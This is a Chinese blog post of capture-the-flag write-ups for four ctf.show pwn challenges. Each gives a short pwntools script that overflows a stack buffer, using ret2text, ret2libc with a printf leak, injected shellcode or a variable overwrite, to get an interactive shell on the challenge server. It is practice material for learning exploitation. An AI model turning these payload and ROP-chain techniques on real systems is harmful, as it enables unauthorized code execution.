PWN-PRACTICE-CTFSHOW-8

最新推荐文章于 2022-11-24 17:53:25 发布
最新推荐文章于 2022-11-24 17:53:25 发布
阅读量1.8k 收藏
点赞数
分类专栏: Pwn-CTFSHOW 文章标签: 安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45582916/article/details/122560196
版权

PWN-PRACTICE-CTFSHOW-8

吃瓜杯-wuqian

栈溢出,ret2text

# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28059)
elf=ELF("./pwn1")

system=elf.plt["system"]
binsh=0x601040
pop_rdi=0x400663
ret=0x400476

io.recvuntil("your name? ")
payload="a"*16+"b"*8+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system)
io.sendline(payload)

io.interactive()

月饼杯II-简单的胖

栈溢出,ret2libc

# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28091)
elf=ELF("./pwn1")

printf_got=elf.got["printf"]
printf_plt=elf.plt["printf"]
pop_rdi=0x400703
pop_rsi_r15=0x400701
ret=0x4004ce
my_format=0x400740
start_addr=0x400510

io.recvuntil("your name? ")
payload="a"*0x20+"b"*8+p64(pop_rdi)+p64(my_format)+p64(pop_rsi_r15)+p64(printf_got)+p64(0)+p64(printf_plt)+p64(start_addr)
io.sendline(payload)
printf_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
print("printf_addr=="+hex(printf_addr))
libc_base=printf_addr-0x064e80
system=libc_base+0x04f440
binsh=libc_base+0x1b3e9a

io.recvuntil("your name? ")
payload="a"*0x20+"b"*8+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system)
io.sendline(payload)

io.interactive()

月饼杯II-容易的胖

栈溢出,ret2shellcode

# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
context.arch="i386"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28076)
elf=ELF("./pwn1")

buf=0x0804A040
io.recvuntil("Input your shellcode\n")
payload=p32(buf+4)
payload+=asm(shellcraft.sh())
io.sendline(payload)

io.recvuntil("use shellcode????\n")
payload="yes\n".ljust(0x10,"\x00")+p32(buf+4)
io.send(payload)

io.interactive()

击剑杯-pwn01-My_sword_is_ready

栈溢出,覆盖栈上数据,使result==666,即可执行后门函数

# -*- coding:utf-8 -*-
from pwn import *
#context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28003)
elf=ELF("./pwn1")

io.recvuntil("with bit!\n")
payload="a"*36+p32(222)*3
io.send(payload)

io.interactive()
P1umH0
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
开关电源的PWN-PFM控制电路
12-09
开关电源的PWN-PFM控制电路 邹怀安 张 锐 胡荣强 武汉理工大学自动化学院 1.引言 开关电源由于在体积、重量、效率和可靠性等多多方面的优势,目前在计算机、通信、家用电器、雷达、空间技术等众多领域中已完全取代...
2021 ctfshow 月饼 pwn 容易的
yongbaoii的博客
09-24 210
保护啥也没有。 看起来似乎是就是一个输入shellcode的过程,但是往哪输入,然后输入进去咋样,题目怎么做,都暂时看不出来,所以需要我们去调试一下。 可以看出来shellcode被放在了0x804a040,这是一个bss上的地址。 我们可以看到,当我们通过’\x00’截断来绕过strcmp正常返回的时候,我们会把ebp-8,也就是v3地方的地址弹到ecx,然后控制了它就可以控制我们函数的返回地址,我们只要让它合适的返回到我们的shellcode上就好啦。 exp from pwn import* .
ctfshow_MISC入门
weixin_45204546的博客
08-20 2073
解压压缩包后,有一张扩展名为png的图片,显示there_is_no_flag_here,显然这不是flag,我们只能从其他方向出发,先去看看属性有没有flag,大小有没有问题,这张图片都没有,那我们就用winhex或者010查看一下。压缩后是六个txt为扩展名的文件,可以进文件里面看一看,有没有flag或者找到一些信息,好像每个文件的类型都不一样,我把每个文件都改为png为扩展名,都能显示出flag。同上,见没有结果后,像我这样的新手,只能一个一个试,现在我们去分离一下图片看看。
ctfshow吃瓜 八月群赛 WriteUp/WP
mumuzi的博客
08-16 2678
可以 Web: shellme 题目问题,没什么说的,进去直接搜ctfshow就是flag 热身 签到题,做过web入门的都应该知道怎么绕,分开来看 比如第一个部分可以用小数绕过,第二部分没有字母,可以用8进制绕过。 所以目前得到的payload是 num=010574 但是第三部分还要看0是不是出现在首位,这里就可以用+号,来凑个数 最终payload num=+010574 PWN wuqian 只会最简单的,别骂了 就一个栈溢出,找到rdi、system、/bin/sh的地址就行了 from
MISC入门篇(8-...更新,在学习中做记录,很多内容是从网上的很多师傅那里看到的)
m0_58327783的博客
10-12 949
ctfmisc学习ing,希望可以一起讨论学习
【ctf秀】【MISC】图片隐写基础题misc1~misc9
积跬步,至千里,读万卷书,行万里路,阅代码,改bug,畅谈天下,指点江山
01-04 5786
图片隐写
pwn-200题目文件
02-16
pwn-200题目文件
pwn-me-backend
03-28
"pwn-me-backend" 是一个基于Java开发的后端项目,根据其命名,可能是用于网络安全教育或CTF(Capture The Flag)竞赛中的一个靶场平台。这个项目可能包含了一些漏洞,目的是让学习者或者参赛者通过逆向工程、内存...
subject_misc_ctfshow:为ctfshow平台出的一些ctf渣项题,生成译文,解题源码之类的原数数据
03-23
subject_misc_ctfshow 为ctfshow平台出的一些ctf杂项题,生成译文,解题源码之类的原数数据 译文说明请阅读译文目录下的Readme.md Readme.md模板 ## 题目名称 ## 题目描述 ## 出题/解题思路 ## flag
ctfshow之misc入门(misc1-mic56未更完)
zzzfff__的博客
11-24 534
这几天入门misc,通过ctfshow的题来学习图片隐写,就当是一个记录了,但是里面有些题涉及到脚本,我又不会写脚本,所以就没有做。所以并不是每题都有wp,看目录吧。
CTF show misc之旅 (wp详解一部分)
路baby的博客
06-18 2637
让我们开启ctf misc之旅吧 加油 感谢ctf show平台提供题目 杂项签到,misc2,Miscx,misc50,misc30,stega1,misc3,misc40,misc30,红包题第一弹,stega10,stega11,misc4,misc31,misc49,misc6,misc7,misc8,红包题第五弹,stega2,stega3..................
CTFshow刷题日记-MISC-图片篇(上)基础操作和信息附加
Love&Share
09-09 3137
ctfshow 图片篇引语 大部分题目仅涉及单一知识点,但可能有多种解法; 找到flag并不困难,关键是了解每一题背后的原理; 藏在哪?为什么可以这样藏?请多考虑这两个问题; misc脑图-misc之神丁神给的 基础操作 misc1-签到题 打开图片就是flag misc2-改后缀 下载之后是一段文本,打开发现png的文件头,将txt后缀改成png,查看图片,获得flag misc3-bpg格式 下载我就直接打开了,我还寻思就这?,原来是我的图片查看器帮了忙,bpg文件,推荐蜂蜜浏览器 [外链图片
2021 ctfshow 月饼 pwn 简单
yongbaoii的博客
09-24 258
显然就是一个简单的栈溢出,但是问题是还是不知道libc。 试了半天libc是2.27的,但是2.27的ibc又会有一个栈对齐的问题。 调试调试给它对齐就行。 有好几处需要栈对齐。 exp from pwn import* context.log_level = "debug" context.terminal = ['tmux', 'splitw', '-h'] r = process("yb1") elf = ELF("./yb1") libc = ELF("./64/libc-2.27.so..
2021 ctfshow 月饼 pwn Moon_note
yongbaoii的博客
09-24 265
保护全开,没给libc。 没给libc真可谓。 菜单 create 设计的很有意思,申请的chunk实现了类似unsorted bin 的一个hash表。 chunk的结构是前16个字节是title,中间16个字节是链表,后八个字节是一会write的时候写内容的chunk地址。 write 就是申请一个chunk,写东西,地址放到上面create里面说的那个玩意里面。 但是只能写一次。 show 正常show delete free掉chunk,但是漏洞就在free掉那个wirte的chunk之后没有清.
ctfshow JJ(击剑) WP 随便写写
mumuzi的博客
11-13 2379
????这几天不高兴 不想写。贴exp 中文识别带师 一个个识别 你和base击剑,谁更强? GIFFrame弄出来 然后扫码脚本 from PIL import Image, ImageSequence from pyzbar import pyzbar from tqdm import tqdm def decQR(img): infos = pyzbar.decode(img) return infos[0][0].decode() def get_QR(img): w,h
ctfshow 月饼(第二届) 部分WriteUp
mumuzi的博客
09-21 2726
Misc 杂项签到 右键附件,从链接另存文件。然后用16进制编辑器或者你想用notepad也彳亍看文件尾,有一串base64,解码即可。 ctfshow{we1come_to_mooncake_cap} 有手就行 查看exif,有一串阿拉伯语,翻译过来是“你知道汉明码吗” 查看图片文件尾,发现一串数字 10110110111 然后随便找一篇看一下是怎么编码的,以及如何纠错的 https://blog.csdn.net/qq_19782019/article/details/87452394 例子他举的也
ctfshow_2021月饼记录
MiGooli的博客
09-21 1693
一、WEB篇 作为队内的web手,差点连签到题都做不出来,属实是拉大胯丢大人了 web签到 <?php //Author:H3h3QAQ include "flag.php"; highlight_file(__FILE__); error_reporting(0); if (isset($_GET["YBB"])) { if (hash("md5", $_GET["YBB"]) == $_GET["YBB"]) { echo "小伙子不错嘛!!flag给你了:" . $fla
攻防世界pwn-forgot
最新发布
08-10
很抱歉,但是我无法回答你的问题。我只能提供关于麦田怪圈的信息。123 #### 引用[.reference_title] - *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界:PWN刷题-forgot](https://blog.csdn.net/m0_53932372/article/details/122244244)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

P1umH0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值